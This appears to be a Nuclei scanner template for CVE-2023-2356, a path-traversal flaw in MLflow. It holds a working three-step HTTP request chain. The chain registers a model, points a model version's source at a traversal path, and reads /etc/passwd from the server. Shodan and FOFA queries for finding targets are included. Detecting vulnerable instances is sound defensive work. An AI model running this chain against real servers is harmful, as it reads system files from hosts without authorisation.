id: CVE-2023-2356 info: name: Mlflow <2.3.0 - Local File Inclusion author: Co5mos severity: high description: | Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1. remediation: | Upgrade Mlflow to version 2.3.0 or above to mitigate the vulnerability. reference: - https://huntr.dev/bounties/7b5d130d-38eb-4133-8c7d-0dfc9a9d9896/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2356 - https://github.com/mlflow/mlflow/commit/f73147496e05c09a8b83d95fb4f1bf86696c6342 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-2356 cwe-id: CWE-23 epss-score: 0.00941 epss-percentile: 0.81406 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" fofa-query: app="MLflow" tags: cve,cve2023,lfi,huntr,mlflow,oss,intrusive variables: str: "{{rand_base(6)}}" http: - raw: - | POST /api/2.0/mlflow/registered-models/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"name": "{{str}}"} - | POST /api/2.0/mlflow/model-versions/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"name": "{{str}}", "source": "file://{{Hostname}}/../../../../../../../"} - | GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: regex regex: - root:[x*]:0:0 - type: status status: - 200 extractors: - type: regex name: version group: 1 regex: - '"version": "([0-9.]+)",' internal: true part: body # digest: 4a0a0047304502202c14f59c09187b23e0b9bb2cd0f6b6a7001750f0956cbac93fd2acf7075d1ac3022100f4d257b1d8d901ae727893e0ff42f9c2a1d5f6f4b6f9f09fb43bf1ae1a86b990:922c64590222798bb761d5b6d8e72950